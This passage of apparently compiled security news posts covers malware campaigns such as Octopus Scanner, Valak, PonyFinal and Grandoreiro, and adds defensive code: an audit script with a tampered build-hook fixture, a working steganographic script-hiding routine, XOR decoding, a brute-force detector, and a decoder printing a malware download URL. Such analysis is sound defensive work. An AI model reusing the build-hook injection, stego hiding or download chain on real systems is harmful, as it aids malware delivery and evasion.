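# page does not give the real modification, so this is a stand-in, not the sample.
TAMPERED_BUILD_XML = CLEAN_BUILD_XML.replace(
    b'<target name="-post-jar"/>',
    b'<target name="-post-jar"><java jar="nbproject/cache.dat" fork="true"/></target>')


def build_sample_tree():
    """Constructed test data: one clean project and one carrying both indicators."""
    root = tempfile.mkdtemp(prefix="nb_audit_")
    for name, build_xml, infected in (("clean", CLEAN_BUILD_XML, False),
                                      ("infected", TAMPERED_BUILD_XML, True)):
        nb = os.path.join(root, name, "nbproject")
        os.makedirs(nb)
        with open(os.path.join(nb, "project.xml"), "wb") as fh:
            fh.write(b"<project/>")
        with open(os.path.join(nb, BUILD_FILE), "wb") as fh:
            fh.write(build_xml)
        if infected:
            with open(os.path.join(nb, PAYLOAD_NAME), "wb") as fh:
                fh.write(b"\x00payload\x00")
    return root


if __name__ == "__main__":
    for project, findings in audit_tree(build_sample_tree()).items():
        print(project, findings or "clean")
```

Run it over a developer workstation’s source directories (or a CI checkout) rather than the sample tree. The string check catches the specific campaign; the baseline comparison is the durable control, because any build-file edit that the project’s own generator did not make deserves a look whatever payload name the next campaign picks.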

“It was interesting that this malware attacked the NetBeans build process specifically since it is not the most common Java IDE in use today,” GitHub concludes.

“If malware developers took the time to implement this malware specifically for NetBeans, it means that it could either be a targeted attack, or they may already have implemented the malware for build systems such as Make, MsBuild, Gradle and others as well and it may be spreading unnoticed,”

“While infecting build processes is certainly not a new idea, seeing it actively deployed and used in the wild is certainly a disturbing trend.”

Pierluigi Paganini

(SecurityAffairs – NetBeans, hacking)

The post Octopus Scanner Malware: open source supply chain attack via NetBeans projects on GitHub appeared first on Security Affairs.

Steganography in targeted attacks on industrial enterprises in Japan and Europe

Threat actors targeted industrial suppliers in Japan and several European countries in sophisticated attacks, Kaspersky reported.

Researchers from Kaspersky’s ICS CERT unit reported that threat actors targeted industrial suppliers in Japan and several European countries in sophisticated attacks.

The experts first observed the attacks in early 2020, while in early May, threat actors targeted organizations in Japan, Italy, Germany and the UK.

Hackers targeted suppliers of equipment and software for industrial enterprises with spear-phishing messages carrying malicious Microsoft Office documents. The attackers used PowerShell scripts as well as various techniques to evade detection and hinder analysis of the malware.

“Phishing emails, used as the initial attack vector, were tailored and customized under the specific language for each specific victim. The malware used in this attack performed destructive activity only if the operating system had a localization that matched the language used in the phishing email.” reads the report published by Kaspersky. “For example, in the case of an attack on a company from Japan, the text of a phishing email and a Microsoft Office document containing a malicious macro were written in Japanese. “

The phishing messages are crafted to trick victims into opening the attached document and enable the macros. The emails are written in the target’s language, and the malware only starts if the operating system language on the machine matches the language in the phishing email.

The hackers used the Mimikatz tool to steal the authentication data of Windows accounts stored on a compromised system. At the time of writing, the final goal of the threat actors is still unknown.

Kaspersky experts only observed malicious activity on IT systems, OT networks were not impacted in the attacks.

Upon executing the macro script contained in the bait document, a PowerShell script is decrypted and executed. This script downloads an image from image hosting services such as Imgur or imgbox, experts noticed that the URL of the image is randomly selected from a list.

The image contains data that is extracted by the malware to create another PowerShell script, which in turn creates yet another PowerShell script: an obfuscated version of the Mimikatz post-exploitation tool.

“The data is hidden in the image using steganographic techniques and is extracted by the malware from pixels defined by the algorithm. Using steganography enables the attackers to evade some security tools, including network traffic scanners.” continues the analysis.

“The data extracted from the image is consecutively encoded using the Base64 algorithm, encrypted with the RSA algorithm and encoded using Base64 again. Curiously, the script has an error in its code, included on purpose, with the exception message used as the decryption key.”

The attackers also used an exception message as the decryption key for the malicious payload; in this case too, the technique is meant to evade detection and complicate analysis, since the key never appears as a literal in the script.
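As an added illustration (not code from Kaspersky’s report or from the attackers’ scripts), the Python below embeds and recovers a Base64-wrapped script in the least significant bits of a constructed RGB pixel buffer, with the channel positions chosen by a key-seeded permutation. The permutation scheme, the key value and the sample script are assumptions made for the example, and the report’s additional RSA layer is not reproduced.

```python
import base64
import random

# Constructed cover: a 64x64 RGB pixel buffer standing in for an image decoded to raw
# pixels (no imaging library needed; real tooling would get these bytes from Pillow).
WIDTH, HEIGHT, CHANNELS = 64, 64, 3


def make_cover(seed=1):
    rng = random.Random(seed)
    return bytearray(rng.randrange(256) for _ in range(WIDTH * HEIGHT * CHANNELS))


def channel_order(key):
    """The 'pixels defined by the algorithm': a key-seeded permutation of every colour
    channel byte, so hidden bits are scattered instead of stored sequentially.
    (Assumed scheme for illustration, not the one Kaspersky observed.)"""
    order = list(range(WIDTH * HEIGHT * CHANNELS))
    random.Random(key).shuffle(order)
    return order


def embed(cover, payload, key):
    """Store a 4-byte big-endian length header plus payload in the least significant
    bit of the selected channel bytes. Each touched byte changes by at most 1."""
    data = len(payload).to_bytes(4, "big") + payload
    bits = [(b >> (7 - i)) & 1 for b in data for i in range(8)]
    order = channel_order(key)
    if len(bits) > len(order):
        raise ValueError("payload too large for this cover")
    stego = bytearray(cover)
    for pos, bit in zip(order, bits):
        stego[pos] = (stego[pos] & 0xFE) | bit
    return stego


def extract(stego, key):
    """Inverse of embed(): read the length header, then exactly that many bytes."""
    order = channel_order(key)

    def read(nbytes, first_bit):
        out = bytearray()
        for k in range(nbytes):
            byte = 0
            for i in range(8):
                byte = (byte << 1) | (stego[order[first_bit + k * 8 + i]] & 1)
            out.append(byte)
        return bytes(out)

    length = int.from_bytes(read(4, 0), "big")
    return read(length, 32)


def hide_script(cover, script, key):
    """Dropper side: Base64-encode the script text (outer layer), then embed it."""
    return embed(cover, base64.b64encode(script.encode()), key)


def recover_script(stego, key):
    """Victim side: pull the bytes out of the pixels and strip the Base64 layer.
    (The real chain had a further RSA layer keyed by an exception message.)"""
    return base64.b64decode(extract(stego, key)).decode()


def max_channel_delta(cover, stego):
    """How visible is the change? LSB embedding alters no channel by more than 1."""
    return max(abs(a - b) for a, b in zip(cover, stego))


# Constructed, benign stand-in for the next-stage PowerShell text.
NEXT_STAGE = "Write-Output 'stage two (constructed sample)'"
KEY = 0x5EC  # assumed shared secret between dropper and extractor

if __name__ == "__main__":
    cover = make_cover()
    stego = hide_script(cover, NEXT_STAGE, KEY)
    print(recover_script(stego, KEY))
    print("max per-channel change:", max_channel_delta(cover, stego))
```

Two points a defender can take from it: the cover changes by at most one unit per channel, which is why a proxy that inspects the downloaded image sees nothing unusual, and the carrier is fetched from a legitimate image host, so detection has to move to the endpoint (PowerShell script-block logging, AMSI) rather than the network.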

Kaspersky confirmed that its solutions have blocked all the attacks it has detected.

“This attack has caught the attention of researchers because the attackers use several unconventional technical solutions.” concludes Kaspersky.

“The use of the above techniques, combined with the pinpoint nature of the infections, indicates that these were targeted attacks. It is a matter of concern that attack victims include contractors of industrial enterprises. If the attackers are able to harvest the credentials of a contractor organization’s employees, this can lead to a range of negative consequences, from the theft of sensitive data to attacks on industrial enterprises via remote administration tools used by the contractor.”

Pierluigi Paganini

(SecurityAffairs – industrial supplier attack, hacking)

The post Steganography in targeted attacks on industrial enterprises in Japan and Europe appeared first on Security Affairs.

Google TAG report Q1 details about nation-state hacking and disinformation

Google Threat Analysis Group (TAG) has published today its first TAG quarterly report that analyzes rising trends in nation-state and financially motivated attacks.

Google also discloses seven coordinated political influence campaigns that took place on its platforms during Q1 2020.

The Google Threat Analysis Group (TAG) is a group inside Google’s security team that tracks operations conducted by nation-state actors and cybercrime groups. Google TAG has published today its first TAG quarterly report, the Q1 2020 TAG Bulletin, which provides insights on the campaigns monitored in the first quarter of 2020.

The report includes recent findings on government-backed phishing, threats, and disinformation campaigns, as well as information about actions the tech giant has taken against accounts involved in coordinated influence campaigns.

A first worrying trend reported by Google is the rise of hack-for-hire companies currently operating out of India.

Another trend is the rising number of political influence campaigns carried out by nation-state actors worldwide.

Experts confirm that threat actors continue to use COVID-19 lures; the pandemic has taken center stage in the world of government-backed hacking. Google continues to uncover COVID-19-themed attacks: groups like the Iran-linked Charming Kitten focus on medical and healthcare professionals, including World Health Organization (WHO) employees.

Experts reported new activity from “hack-for-hire” firms, many based in India, that are using Gmail accounts spoofing the WHO to target business leaders in financial services, consulting, and healthcare corporations within numerous countries including the U.S., Slovenia, Canada, India, Bahrain, Cyprus, and the UK.

The lures are designed to trick victims into signing up for direct notifications from the WHO to stay informed of COVID-19 related announcements, and link to websites under the control of the attackers that clone the official WHO website. 

“We’ve seen new activity from “hack-for-hire” firms, many based in India, that have been creating Gmail accounts spoofing the WHO,” said Shane Huntley, head of Google TAG.

“The accounts have largely targeted business leaders in financial services, consulting, and healthcare corporations within numerous countries including, the US, Slovenia, Canada, India, Bahrain, Cyprus, and the UK.”


While there are many hack-for-hire companies around the world, most are located in the EU, Israel, and some Arab countries.

This is the first time that a report references the activity of hack-for-hire Indian companies.

The Google TAG also investigated groups that have also engaged in coordinated social and political influence campaigns.

The TAG team tracked a total of seven influence operations in Q1 2020.

In January, Google terminated three YouTube channels as part of a coordinated influence operation linked to the Iranian state-sponsored International Union of Virtual Media (IUVM) news organization.

In February, the company terminated one advertising account and 82 YouTube channels that were employed in a coordinated influence operation linked to Egypt.

The campaign was sharing political content in Arabic that was supportive of Saudi Arabia, the UAE, Egypt, and Bahrain and critical of Iran and Qatar. The campaign was tied to the digital marketing firm New Waves, based in Cairo.

In March, TAG terminated five different influence operations.

  • Three advertising accounts, one AdSense account, and 11 YouTube channels part of a coordinated influence operation linked to India sharing pro-Qatar messages.
  • Google banned one Play Store developer and terminated 68 YouTube channels as part of a coordinated influence operation sharing political content in Arabic supportive of Turkey and critical of the UAE and Yemen.
  • Google also terminated one advertising account, one AdSense account, and 17 YouTube channels, and banned one Play developer, involved in a coordinated influence operation linked to Egypt that was supportive of Saudi Arabia, the UAE, Egypt, and Bahrain and critical of Iran and Qatar.
  • Google also banned one Play developer and terminated 78 YouTube channels used in a coordinated influence operation linked to Serbia.
  • Google also shut down 18 YouTube channels that were part of a coordinated influence operation linked to Indonesia.

“Since March, we’ve removed more than a thousand YouTube channels that we believe to be part of a large campaign and that were behaving in a coordinated manner. These channels were mostly uploading spammy, non-political content, but a small subset posted primarily Chinese-language political content similar to the findings of a recent Graphika report. We’ll also share additional removal actions from April and May in the Q2 Bulletin.” concludes Google.

Pierluigi Paganini

(SecurityAffairs – Google TAG, nation-state hacking)

The post Google TAG report Q1 details about nation-state hacking and disinformation appeared first on Security Affairs.

Valak a sophisticated malware that completely changed in 6 months

Valak malware has rapidly changed over the past six months, it was initially designed as a loader, but now it implemented infostealer capabilities.

The Valak malware completely changed over the past six months, it was first developed to act as a loader, but now it implements also infostealer capabilities. 

The malicious code first appeared in the threat landscape in late 2019; over the past six months experts observed more than 30 versions that turned the malware from a loader into an infostealer used in attacks against individuals and enterprises.

“The Valak Malware is a sophisticated malware previously classified as a malware loader. Though it was first observed in late 2019, the Cybereason Nocturnus team has investigated a series of dramatic changes, an evolution of over 30 different versions in less than six months.” reads the analysis published by Cybereason. “This research shows that Valak is more than just a loader for other malware, and can also be used independently as an information stealer to target individuals and enterprises. “

The malicious code was employed in attacks mainly aimed at entities in the US and Germany, in which it was previously bundled with Ursnif and IcedID threats.

The attack chain starts with phishing messages carrying a weaponized Microsoft Word document containing malicious macros. Upon enabling the macros, a .DLL file named “U.tmp” is downloaded and saved to a temporary folder.


When the DLL is executed, it drops a malicious JavaScript file and launches it via a WinExec API call; the JavaScript file has a random name that changes each time it is executed.

The JavaScript code establishes connections to the command-and-control (C2) servers. The script also downloads additional files, decodes them using Base64 and an XOR cipher, and then deploys the main payload.
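The Base64-then-XOR layering is simple to reverse once the key is known, and recoverable when it is not. The Python below is an added example (not Cybereason’s code or Valak’s own); the key, the fake second-stage script and the blob are constructed for the example. It also shows the known-plaintext trick an analyst uses when the key is buried in obfuscated JavaScript: XOR the ciphertext with what the plaintext must start with and look for the repeating period.

```python
import base64
from itertools import cycle


def xor_bytes(data, key):
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decode_stage(blob_b64, key):
    """Valak-style layering as the report describes it: Base64 on the outside,
    repeating-key XOR underneath."""
    return xor_bytes(base64.b64decode(blob_b64), key)


def recover_key(blob_b64, known_prefix, max_keylen=32):
    """Known-plaintext key recovery. XOR the ciphertext prefix with what the
    plaintext must start with (e.g. b'MZ' for a PE, b'var ' for a script) to get a
    keystream prefix, then return the shortest period that explains it. Only
    trustworthy when the known prefix is at least twice the key length, which is
    why periods longer than half the prefix are rejected (returns None)."""
    ct = base64.b64decode(blob_b64)
    stream = xor_bytes(ct[: len(known_prefix)], known_prefix)
    for klen in range(1, min(max_keylen, len(stream) // 2) + 1):
        if all(stream[i] == stream[i % klen] for i in range(len(stream))):
            return stream[:klen]
    return None


# Constructed sample: a fake second-stage script and the key that protects it.
KEY = bytes([0x5A, 0x13, 0x77, 0xC4])
STAGE = b'var c2 = "http://c2.example.invalid/a.aspx";\nvar sleep = 600;\n'
SAMPLE_BLOB = base64.b64encode(xor_bytes(STAGE, KEY)).decode()

if __name__ == "__main__":
    print(decode_stage(SAMPLE_BLOB, KEY).decode())
    print("recovered key:", recover_key(SAMPLE_BLOB, b"var c2 = "))
```

The same approach works for the downloaded modules: a .NET plugin starts with the PE header, so b"MZ\x90\x00" usually gives enough known plaintext to recover a short key.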

“In the first stage, Valak laid the foundation for the attack. In the second stage, it downloads additional modules for reconnaissance activity and to steal sensitive information.” continues the post.

Valak uses two main payloads, project.aspx and a.aspx. The former (the second-stage JS) manages registry keys, task scheduling for malicious activities, and persistence, whereas the latter, named “PluginHost.exe”, is an executable file used to manage additional components.

Valak’s Program class contains the file’s main function, main(), which executes the function GetPluginBytes() to download the module components of type “ManagedPlugin”. These components are loaded reflectively into the executable’s memory and give the malware plugin capabilities.

PluginHost.exe implements multiple functions by loading specific modules; below is a list of the modules observed by the experts:

  • Systeminfo: responsible for extensive reconnaissance; targets local and domain admins
  • Exchgrabber: aims to steal Microsoft Exchange data and infiltrate the enterprise mail system
  • IPGeo: verifies the geolocation of the target
  • Procinfo: collects information about the infected machine’s running processes
  • Netrecon: performs network reconnaissance
  • Screencap: captures screenshots from the infected machine

The Systeminfo module contains several reconnaissance functions that allow gathering information about the user, the machine, and existing AV products.

Recent Valak variants have been employed in attacks against Microsoft Exchange servers, likely as part of attacks against enterprises.

“More recent versions of Valak target Microsoft Exchange servers to steal enterprise mailing information and passwords along with the enterprise certificate. This has the potential to access critical enterprise accounts, causing damage to organizations, brand degradation, and ultimately a loss of consumer trust.” concludes the post.

“The extended malware capabilities suggest that Valak can be used independently with or without teaming up with other malware. That being said, it seems as though the threat actor behind Valak is collaborating with other threat actors across the E-Crime ecosystem to create an even more dangerous piece of malware.”

Pierluigi Paganini

(SecurityAffairs – Valak, malware)

The post Valak a sophisticated malware that completely changed in 6 months appeared first on Security Affairs.

Ke3chang hacking group adds new Ketrum malware to its arsenal

The Ke3chang hacking group added a new malware dubbed Ketrum to its arsenal, it borrows portions of code and features from older backdoors.

The Ke3chang hacking group (aka APT15, Vixen Panda, Playful Dragon, and Royal APT) has developed new malware dubbed Ketrum by borrowing parts of the source code and features from their older Ketrican and Okrum backdoors.

“In mid May, we identified three recently uploaded samples from VirusTotal that share code with older APT15 implants. We named this new family of samples, “Ketrum”, due to the merger of features in the documented backdoor families “Ketrican” and “Okrum”.” reads the report published by the security firm Intezer.

“We believe the operation was conducted very recently.”

Back in 2013, security researchers at FireEye spotted a group of China-linked hackers conducting an espionage campaign against foreign affairs ministries in Europe. The campaign was named ‘Operation Ke3chang’; the threat actors behind it were later spotted targeting personnel at Indian embassies across the world.

In May 2016, researchers from Palo Alto found evidence that the threat actors behind the Operation Ke3chang had been active since at least 2010.

The cyber-espionage group is believed to be operating out of China, it also targeted military and oil industry entities, government contractors and European diplomatic missions and organizations.

Intezer researchers recently discovered three Ketrum backdoor samples uploaded to the VirusTotal platform; they noticed the samples reuse part of the source code and features of Ke3chang’s Ketrican and Okrum backdoors.

“Both Ketrum samples resemble a similar layout to previous Ke3chang tools, apart from low-level implementation and use of system APIs,” continues the analysis. “Even in the two Ketrum samples, there are differences between the low-level APIs used to achieve the same functionality.”

The three Ketrum samples connected to the same China-based command and control server and were used in two different time periods.

The command and control (C2) server was shut down during mid-May after the Ketrum samples were spotted.

Below the differences between the backdoors, as tabulated by Intezer (✅ = present, ❌ = absent, one mark for each of the four backdoors compared: Ketrican, Okrum and the two Ketrum samples; the marks for the first three rows did not survive in this copy):

  • Identify installed proxy servers and use them for HTTP requests
  • Special folder retrieval using registry key [HKEY_CURRENT_USER\Software\ Explorer\Shell Folders]
  • The response from the server is an HTTP page with backdoor commands and arguments included in the HTML fields
  • Backdoor commands are determined by a hashing value received from C2: ❌ ✅ ❌ ❌
  • Communication with the C&C server is hidden in the Cookie and Set-Cookie headers of HTTP requests: ❌ ✅ ✅ ❌
  • Impersonate a logged-in user’s security context: ❌ ✅ ✅ ❌
  • Create a copy of cmd.exe in their working directory and use it to interpret backdoor commands: ✅ ❌ ✅ ❌
  • Usual Ke3chang backdoor functionalities (download, upload, execute files/shell commands and configure sleep time): ✅ ✅ ✅ ✅
  • Screenshot-grabbing functionality: ❌ ❌ ✅ ❌

The Ketrum 1 sample was uploaded to VirusTotal in December 2019 and carries a fake compilation timestamp of January 7, 2010. It implements many features from Okrum but abandons Okrum’s more advanced features.

The newer Ketrum 2 seems to have been built for minimalism: it drops most of the features of the older Ke3chang backdoors that it does not need.

“Unlike the Ketrican variant, Ketrum implants no longer try to weaken the system’s security configurations. In previous implants, Powershell was used for this end.” states the report.

“The group continues to morph its code and switch basic functionalities in their various backdoors. This strategy has been working for the group for years and there is no indication yet that it will deviate from this modus operandi.”

The Intezer report includes indicators of compromise (IOCs) and additional details about the new Ketrum malware.

Pierluigi Paganini

(SecurityAffairs – Ke3chang, hacking)

The post Ke3chang hacking group adds new Ketrum malware to its arsenal appeared first on Security Affairs.

Microsoft warns about ongoing PonyFinal ransomware attacks

Microsoft is warning organizations to deploy protections against a new strain of PonyFinal ransomware that has been in the wild over the past two months.

Microsoft’s security team issued a series of tweets warning organizations to deploy protections against a new piece of ransomware dubbed PonyFinal that has been in the wild over the past two months.

PonyFinal is Java-based ransomware that is manually distributed by threat actors. The ransomware first appeared in the threat landscape earlier this year and was involved in highly targeted attacks against selected targets, mainly in India, Iran, and the US.

Human-operated ransomware is a technique usually associated with nation-state attacks that is becoming very popular in the cybercrime ecosystem.

In a human-operated ransomware attack scenario, attackers use stolen credentials and exploit misconfigurations and vulnerabilities to access target networks, then attempt to escalate privileges and move laterally, deliver malware and exfiltrate data.

The most infamous human-operated ransomware campaigns include Sodinokibi, Samas, Bitpaymer, and Ryuk.

PonyFinal operators initially target the organization’s systems management server via brute-force attacks, then deploy a VBScript that runs a PowerShell reverse shell to perform data dumps. The threat actors also use a remote manipulator system to bypass event logging.

Once the PonyFinal attackers have gained access to the target’s network, they move laterally to infect other systems with the ransomware.
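The initial access described above (password guessing against a management server, followed by a successful logon from the same source) is one of the few noisy moments in a human-operated ransomware intrusion. The Python below is an added example, not part of Microsoft’s advisory: it runs a per-source sliding-window count over a constructed sample of Windows 4625/4624 events (the CSV fields are an assumed reduction of the real event schema) and records whether the same source later logged on successfully.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of Windows Security events reduced to CSV fields
# (timestamp, event id, account, source IP). 4625 = failed logon, 4624 = successful logon.
SAMPLE_EVENTS = """\
2020-05-20T02:10:01,4625,administrator,203.0.113.9
2020-05-20T02:10:03,4625,admin,203.0.113.9
2020-05-20T02:10:04,4625,sccm_admin,203.0.113.9
2020-05-20T02:10:06,4625,svc_sccm,203.0.113.9
2020-05-20T02:10:07,4625,backup,203.0.113.9
2020-05-20T02:10:09,4625,administrator,203.0.113.9
2020-05-20T02:10:10,4625,admin,203.0.113.9
2020-05-20T02:10:12,4625,sccm_admin,203.0.113.9
2020-05-20T02:10:13,4625,svc_sccm,203.0.113.9
2020-05-20T02:10:15,4625,backup,203.0.113.9
2020-05-20T02:10:16,4625,administrator,203.0.113.9
2020-05-20T02:10:18,4625,svc_sccm,203.0.113.9
2020-05-20T02:11:40,4624,svc_sccm,203.0.113.9
2020-05-20T08:01:11,4625,jdoe,198.51.100.7
2020-05-20T08:01:25,4625,jdoe,198.51.100.7
2020-05-20T08:01:40,4624,jdoe,198.51.100.7
"""


def parse_events(text):
    """Parse the CSV reduction into (timestamp, event_id, account, ip) tuples, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, account, ip = line.split(",")
        events.append((datetime.fromisoformat(ts), int(event_id), account, ip))
    return sorted(events)


def detect_bruteforce(events, threshold=10, window=timedelta(minutes=5)):
    """Sliding window per source IP: raise an alert once `threshold` failed logons
    from one source fall inside `window`, and record whether that source later
    logged on successfully (the brute-force-then-login pattern). Returns
    {ip: {"first_alert": datetime, "failures": int, "accounts": int, "success_as": str|None}}."""
    recent = defaultdict(deque)       # ip -> failure timestamps still inside the window
    failures = defaultdict(int)       # ip -> total failures seen
    accounts = defaultdict(set)       # ip -> distinct accounts tried (spraying indicator)
    alerts = {}
    for ts, event_id, account, ip in events:
        if event_id == 4625:
            q = recent[ip]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()
            failures[ip] += 1
            accounts[ip].add(account)
            if len(q) >= threshold and ip not in alerts:
                alerts[ip] = {"first_alert": ts, "failures": 0, "accounts": 0, "success_as": None}
        elif event_id == 4624 and ip in alerts and alerts[ip]["success_as"] is None:
            alerts[ip]["success_as"] = account   # the guess that worked
    for ip, alert in alerts.items():
        alert["failures"] = failures[ip]
        alert["accounts"] = len(accounts[ip])
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_bruteforce(parse_events(SAMPLE_EVENTS)).items():
        print(ip, alert)
```

A user who mistypes a password twice and then logs in (198.51.100.7) never reaches the threshold; the guessing source does, and the later 4624 for svc_sccm from the same address is the event worth paging on, because everything after it (VBScript, reverse shell, lateral movement) will look like legitimate administration.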

In many cases, attackers targeted workstations already running the Java Runtime Environment (JRE), because PonyFinal is written in Java, but in some attacks the gang installed the JRE on systems before deploying the ransomware.

The PonyFinal ransomware usually adds the “.enc” extension to the names of the encrypted files and drops a ransom note (named README_files.txt) on the infected systems; the ransom note contains the payment instructions.

Experts pointed out that the encryption scheme of the PonyFinal ransomware is secure and that, at the time, there was no way to recover encrypted files.

Unfortunately, PonyFinal is one of several human-operated ransomware families employed in attacks aimed at the healthcare sector during the COVID-19 pandemic.

Other threats include NetWalker, Maze, REvil, RagnarLocker, and LockBit.

Pierluigi Paganini

(SecurityAffairs – Ponyfinal ransomware, hacking)

The post Microsoft warns about ongoing PonyFinal ransomware attacks appeared first on Security Affairs.

Grandoreiro Malware implements new features in Q2 2020

The updated Grandoreiro Malware equipped with latenbot-C2 features in Q2 2020 now extended to Portuguese banks

Grandoreiro is a Latin American banking trojan targeting Brazil, Mexico, Spain, Peru, and has now extended to Portugal.

Cybercriminals compromise computers to generate revenue by exfiltrating information from victims’ devices, typically banking-related information. During April and May 2020, a new Grandoreiro variant was identified. This piece of malware includes improvements in the way it operates. The threat has been disseminated via malscam campaigns, as in the past, and the name of the victim is used as part of the malicious attachment name, as shown below.

The attached file is an HTML document that downloads Grandoreiro’s 1st stage, a VBScript file (VBS). After that, an ISO file is downloaded from the online server, selected according to the target country and campaign. During this investigation, several samples were found online, grouped by campaign and country (see Technical Analysis).

The malware modus operandi is very similar to older samples; however, this new variant brings some improvements to how it communicates with the C2 server. After analyzing it, similarities with the C2 traffic of Latenbot (another Brazilian trojan) were identified; they are described below.

Grandoreiro operators are probably including Latenbot botnet modules as a way of improving communication between the C2 and infected hosts, creating a kind of Grandoreiro botnet.

The malware is capable of collecting banking details from victims’ devices, taking total control of the OS (reboot and lockdown), displaying overlay windows, logging keystrokes, and interacting with the browser.

For more details about this threat see the Technical Analysis below.

Technical Analysis

The Grandoreiro malware has been distributed via malscam campaigns around the globe during Q2 2020. As observed throughout this publication, new features have been added to the new samples, including Latenbot C2 features (Latenbot is another Brazilian trojan; see @hasherezade’s analysis here), and the scope of the malware has now been extended to Portuguese banks.

Figure 1: Grandoreiro email template Q2 2020 (Portugal). The content of the attached file is HTML with a short URL that downloads the next stage (VBS file).

As observed below, after submitting the sample to VirusTotal it was classified as a variant of the Grandoreiro trojan, since some changes were made by the crooks to improve this piece of malware.

Figure 2: Grandoreiro variant VT sample submitted on 2020-04-24 during this investigation.

This specific sample was distributed via a VBScript file, one of the different chains of Grandoreiro as detailed by ESET.

Figure 3: Possible ways that Grandoreiro distribution chains may appear (different colors show different paths the chain may take). The final ZIP archive may be encrypted and in some cases also protected by a password – credits ESET.

The malware has been distributed during April and May 2020 and has affected Portuguese users. One of the last analyzed samples (2020-05-21 – 8491a619dc6e182437bd4482d6e97e3a) is scrutinized below.

Grandoreiro VBS file – First stage (Portugal May 2020)

Filename: Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbs
MD5: 8491a619dc6e182437bd4482d6e97e3a
SHA1: 46d601a56103bf0a623d1c937eab41d8772de644

At first glance, the VBS file seems obfuscated; nonetheless, some details can be extracted, such as the encoded string with the URL from which the next stage is downloaded and the location where it will be executed on the target machine.

Figure 4: Grandoreiro VBS file (1st stage), obfuscated. Some details can be extracted from the code, as highlighted above.

The following piece of code can be used to decode the strings hardcoded in the VBS file.

' Decryptor Grandoreiro VBS 1st stage - Portugal May 2020
' @sirpedrotavares
' Sample: 8491a619dc6e182437bd4482d6e97e3a
' Usage: cscript //nologo grandoreiro_vbs_decryptor.vbs
Dim cipher, i, result
' Encoded string taken from the obfuscated VBS (holds the URL of the ISO, i.e. the 2nd stage)
cipher = "bnnj4))+3,(,-0(+.1(+**4+3/*)Cho`nolcifm(cmi"
result = ""
' Each character was stored shifted down by 6, so add 6 back to every character code
For i = 1 To Len(cipher)
    result = result & Chr(Asc(Mid(cipher, i, 1)) + 6)
Next
WScript.Echo result


The decoded string is a URL pointing to a website where several samples of Grandoreiro are available. The samples are downloaded depending on the initial stage and the target country. The following URL was distributed in Portugal during April and May 2020 and is described in this investigation.

Encoded string: cipher="bnnj4))+3,(,-0(+.1(+**4+3/*)Cho`nolcifm(cmi"
Decoded string: http://192.236.147[.]100:1950/Inufturiols.iso

The Grandoreiro samples available on this server were frequently changed by the criminals as a way of bypassing AV detection. Based on metrics from May 20th, 1771 users were potentially infected, i.e. had downloaded or executed the Grandoreiro 1st stage (VBS file).

Figure 5: Metrics collected from the Grandoreiro server on May 20th, 2020. Each sample is associated with different ongoing campaigns and target countries.

In detail, the sample distributed in Portugal was downloaded 224 times (Inufturiols.iso in Figure 5). The sample was available for download between 2020-05-18 and 2020-05-22.

An interesting point is that one day after data collection, on 2020-05-21, most of the samples were removed from the server by the malware operators, but the sample targeting Portugal was kept available for the following days.

Figure 6: Metrics collected from the server on May 21st, 2020 with the Portuguese sample kept by crooks.

The threats available on the server are the same, but different samples were created by the Grandoreiro operators, as observed below. The samples were grouped by country or campaign.

Figure 7: Grandoreiro samples (ISO files) available on the server online. 

The ISO files range from 4 MB to 7 MB, an unusual size for disc image files. An ISO file is an archive containing all the data that would be written to an optical disc; the malware is inside it and is dropped when the file is opened. This is not new: several threats have been distributed via ISO files in past months (see more details in the ThreatPost publication here).

Digging into the details, when the VBS file (1st stage) is executed on the victim’s machine, the ISO file is downloaded from the server online.

Figure 8: ISO file downloaded from the server online and stored on the IE web cache.

Next, the folder “nvreadmm” is created in the AppData\Roaming directory, and the zip file with the malware inside is dropped there (the zip filename can be observed in Figure 4 above).

Figure 9: Zip file with the malware inside is dropped into the “AppData\Roaming\nvreadmm” folder.

When the download is done, the unzip process starts. The PE file (Grandoreiro trojan malware) is extracted into the same folder and executed.

Figure 10: Grandoreiro extracting process ~ binary with a size of 331 MB.

Grandoreiro – Final Payload (Portugal May 2020)

Filename: Inufturiols.exe
MD5: 1f861de0794cd020072150db618da154
SHA1: c3f70025857ac7eca467412d35f17fc5ec10f659

The final payload is a PE file written in Delphi – a Latin American banking trojan. According to ESET, “Grandoreiro has been active at least since 2017 targeting Brazil and Peru, expanding to Mexico and Spain in 2019. “

The malware scope has now been extended to Portugal as well, with several Portuguese banks included in the malware operations, as highlighted below.

Figure 11: List of the Portuguese banks included in the Grandoreiro version of May 2020.

A complete list of the targeted banking organizations, as dumped from the binary’s string table (address and string), can be found below (Grandoreiro May 2020). The prefixes TRAVA and RECORTE are Portuguese for “lock” and “cut-out”.

00CF0808 'Cecabank'
00CF081C 'natwest'
00CF082C 'SantanderUK'
00CF0840 'HSBCUK'
00CF0850 'Barclays'
00CF0864 'BICE'
00CF0874 'Ripley'
00CF0884 'Bci'
00CF0890 'Chile'
00CF08A0 'BancoEstado'
00CF08B4 'Falabella'
00CF08C8 'Itaú'
00CF08D8 'Santander'
00CF08EC 'Scotiabank'
00CF0900 'PT_1'
00CF8E00 'Cecabank'
00CF8E14 'natwest'
00CF8E24 'SantanderUK'
00CF8E38 'HSBCUK'
00CF8E48 'Barclays'
00CF8E5C 'BICE'
00CF8E6C 'Ripley'
00CF8E7C 'Bci'
00CF8E88 'Chile'
00CF8E98 'BancoEstado'
00CF8EAC 'Falabella'
00CF8EC0 'Itaú'
00CF8ED0 'Santander'
00CF8EE4 'Scotiabank'
00CF8EF8 'PT_1'
00CF8F7C 'EUR '
00CF8F98 'TRAVALiberbank'
00CF8FB0 'TRAVABBVA'
00CF8FC4 'TRAVABANKIA'
00CF8FD8 'TRAVAlacaixa'
00CF8FF0 'TRAVASTESPANHA'
00CF9008 'TRAVABLOCKCHAIN'
00CF9020 'TRAVACAJARURAL'
00CF9038 'TRAVASabadell'
00CF9050 'TRAVABANKINTER'
00CF9068 'TRAVAlabooral'
00CF9080 'TRAVAcajamar'
00CF9098 'TRAVAOpenbank'
00CF90B0 'TRAVAING'
00CF90C4 'TRAVAPichincha'
